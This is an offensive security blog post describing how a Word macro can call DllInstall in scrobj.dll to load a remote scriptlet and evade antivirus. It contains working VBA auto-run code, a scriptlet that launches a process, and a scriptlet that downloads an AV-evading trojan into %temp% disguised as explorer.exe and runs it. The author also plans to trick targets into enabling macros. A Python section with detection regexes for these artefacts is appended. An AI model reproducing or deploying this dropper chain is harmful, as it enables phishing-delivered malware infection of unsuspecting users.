Preface
Just for fun.
Key points
- Macro code that loads a remote sct file without running the regsvr32 command, to evade AV
- C# can execute JS; loading via deserialization
How it works:
The macro calls the DllInstall API exported by scrobj.dll and passes it the path of the remote sct file.
Private Declare PtrSafe Function DllInstall Lib "scrobj.dll" (ByVal bInstall As Boolean, ByRef pszCmdLine As Any) As Long
Sub AutoOpen()
DllInstall False, ByVal StrPtr("ip/y.sct") ' False = "Don't install"
End Sub
Follow-up steps
0x01 Host an sct file remotely
For example, pop a calculator:
<?XML version="1.0"?>
<scriptlet>
<registration
progid="TESTING"
classid="{A1112221-0000-0000-3000-000DA00DABFC}" >
<script language="JScript">
<![CDATA[
var foo = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>
Afterwards, all that is needed is for the Word macro to load this sct file remotely.
0x02 AV evasion
The procedure is the same as before.
<?XML version="1.0"?>
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var WSHShell = new ActiveXObject("WScript.Shell");
path = WSHShell.ExpandEnvironmentStrings("%temp%");
var filepath = path+"/explorer.exe";
var xhr = new ActiveXObject("MSXML2.XMLHTTP");
xhr.open("GET","免杀马", false);
xhr.send();
if (xhr.Status == 200) {
var fso = new ActiveXObject("Scripting.FileSystemObject");
var stream = new ActiveXObject("ADODB.Stream");
stream.Open();
stream.Type = 1;
stream.Write(xhr.ResponseBody);
stream.Position = 0;
if (fso.FileExists(filepath)){
fso.DeleteFile(filepath);
}
stream.SaveToFile(filepath);
stream.Close();
new ActiveXObject("WScript.Shell").Exec(filepath);
}
]]>
</script>
</registration>
</scriptlet>
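From the defender's side, both artefacts above leave simple static fingerprints: the VBA declares DllInstall from scrobj.dll and points it at an .sct path, and the scriptlet bodies combine WScript.Shell, MSXML2.XMLHTTP and ADODB.Stream to launch or drop files. The following Python is an added example, not code from the original post or from Casey Smith's work, that turns those fingerprints into indicator checks and a coarse verdict; the sample inputs are constructed for the demo (the URL and classid are placeholders) and the indicator names are my own.

```python
import re

# Added example (not from the original post): static indicator checks for the
# two artefacts the post describes, a VBA macro that declares DllInstall from
# scrobj.dll and a scriptlet (.sct) body that launches a process or downloads
# and drops a file through COM objects. Patterns are built only from what the
# page shows; the sample inputs below are constructed for the demo.

VBA_INDICATORS = {
    # Declare of DllInstall imported from scrobj.dll (PtrSafe is optional)
    "scrobj_dllinstall": re.compile(
        r'Declare\s+(?:PtrSafe\s+)?Function\s+DllInstall\s+Lib\s+"scrobj\.dll"', re.I),
    # auto-executing entry point used by the post
    "auto_open": re.compile(r"\bSub\s+AutoOpen\b", re.I),
    # any quoted string literal ending in .sct
    "sct_path_literal": re.compile(r'"[^"\s]+\.sct"', re.I),
}

SCT_INDICATORS = {
    "scriptlet_root": re.compile(r"<scriptlet>", re.I),
    "wscript_shell": re.compile(r'ActiveXObject\("WScript\.Shell"\)', re.I),
    "process_launch": re.compile(r"\.(?:Run|Exec)\(", re.I),
    "http_client": re.compile(r'ActiveXObject\("MSXML2\.XMLHTTP"\)', re.I),
    "binary_stream": re.compile(r'ActiveXObject\("ADODB\.Stream"\)', re.I),
    "temp_dir": re.compile(r"%temp%", re.I),
}


def scan(text: str, indicators: dict) -> list:
    """Return the sorted names of all indicators that match the text."""
    return sorted(name for name, rx in indicators.items() if rx.search(text))


def classify(text: str) -> str:
    """Map indicator hits to a coarse verdict (names are this example's own).

    macro-sct-loader : VBA importing DllInstall from scrobj.dll
    sct-downloader   : scriptlet that fetches over HTTP and writes a binary stream
    sct-launcher     : scriptlet that only spawns a process via WScript.Shell
    no-indicators    : nothing from the page's technique was found
    """
    vba = set(scan(text, VBA_INDICATORS))
    sct = set(scan(text, SCT_INDICATORS))
    if "scrobj_dllinstall" in vba:
        return "macro-sct-loader"
    if "scriptlet_root" in sct and {"http_client", "binary_stream"} <= sct:
        return "sct-downloader"
    if "scriptlet_root" in sct and {"wscript_shell", "process_launch"} <= sct:
        return "sct-launcher"
    return "no-indicators"


# Constructed samples (placeholder URL and classid, not real infrastructure).
MACRO_SAMPLE = (
    'Private Declare PtrSafe Function DllInstall Lib "scrobj.dll" '
    "(ByVal bInstall As Boolean, ByRef pszCmdLine As Any) As Long\n"
    "Sub AutoOpen()\n"
    'DllInstall False, ByVal StrPtr("http://example.invalid/y.sct")\n'
    "End Sub\n"
)

BENIGN_MACRO = 'Sub AutoOpen()\n    MsgBox "Welcome"\nEnd Sub\n'

SCT_LAUNCHER_SAMPLE = (
    '<?XML version="1.0"?>\n<scriptlet>\n<registration progid="SAMPLE" '
    'classid="{00000000-0000-0000-0000-000000000000}">\n'
    '<script language="JScript"><![CDATA[\n'
    'var foo = new ActiveXObject("WScript.Shell").Run("calc.exe");\n'
    "]]></script>\n</registration>\n</scriptlet>\n"
)

# Only the indicator-bearing lines are kept; this is not a working dropper.
SCT_DOWNLOADER_SAMPLE = (
    '<?XML version="1.0"?>\n<scriptlet>\n<registration progid="SAMPLE" '
    'classid="{00000000-0000-0000-0000-000000000000}">\n'
    '<script language="JScript"><![CDATA[\n'
    'var sh = new ActiveXObject("WScript.Shell");\n'
    'var dst = sh.ExpandEnvironmentStrings("%temp%") + "/sample.exe";\n'
    'var xhr = new ActiveXObject("MSXML2.XMLHTTP");\n'
    'var stream = new ActiveXObject("ADODB.Stream");\n'
    "sh.Exec(dst);\n"
    "]]></script>\n</registration>\n</scriptlet>\n"
)

if __name__ == "__main__":
    for label, sample in [("macro", MACRO_SAMPLE), ("benign", BENIGN_MACRO),
                          ("launcher", SCT_LAUNCHER_SAMPLE),
                          ("downloader", SCT_DOWNLOADER_SAMPLE)]:
        print(label, classify(sample),
              scan(sample, VBA_INDICATORS) + scan(sample, SCT_INDICATORS))
```

The verdict deliberately keys on the DllInstall/scrobj.dll import rather than on AutoOpen alone, since AutoOpen is common in legitimate documents; the benign sample above triggers only that indicator and is reported as clean. In a real pipeline the VBA text would come from a macro extractor and the sct text from a proxy or sandbox capture, with the verdict feeding an alert rather than a print.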
0x03 Some handling of the Word document
Later I'll think about how to get the target to enable macros and how to make it look more convincing.
0x04 Summary
Thanks to the friends who were willing to play along with me.